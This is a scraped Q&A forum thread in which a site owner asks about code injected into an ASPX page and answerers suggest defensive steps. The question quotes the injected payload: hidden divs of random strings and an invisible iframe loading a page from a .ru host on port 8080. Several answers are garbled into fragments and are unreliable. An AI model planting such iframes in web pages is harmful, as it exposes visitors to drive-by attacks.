They attack me - what can I do?

Question

They attack me - what can I do?

Someone puts this code on my aspx page.

What are they doing?

How do they do it?

How to stop them?

This is on a shared hosting server.

This is on an aspx content page that has a main page and after the tag </asp:content>...

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>

+3

.net

Brendan waters Oct 7 '09 at 9:04

source share

6 answers

squeeks · Answer 1 · 2009-10-07T09:11:06+0000

Take your website offline.

No, I'm serious.

Take it offline and look at all the points that you use with user inputs, and look at your code and misinform each user input and each output. There is a lot of documentation on XSS, Code Injection, etc.

dr. evil · Answer 2 · 2009-10-07T09:24:42+0000

SQL Injection? , - "DECLARE" . ( , SQL Server)

borjab · Answer 3 · 2009-10-07T09:54:39+0000

, . Google :

Paul · Answer 4 · 2009-10-07T09:24:24+0000

- ? URL? validateRequest false?

ilivewithian · Answer 5 · 2009-10-07T09:29:35+0000

aspx, </asp:content>...

, - .aspx ? , ftp ..

, , @squeeks - .

KMån · Answer 6 · 2009-10-07T10:01:26+0000

Try exploring the AntiXSS library; pages that are important, turn them off for a while. I believe that you will need to update the code, use AntiXSS in every url; switch all your direct requests to generate requests based on parameters; and than, everything will be under control. In addition, there are many things in google / bing regarding whitelist items.

They attack me - what can I do?

More articles: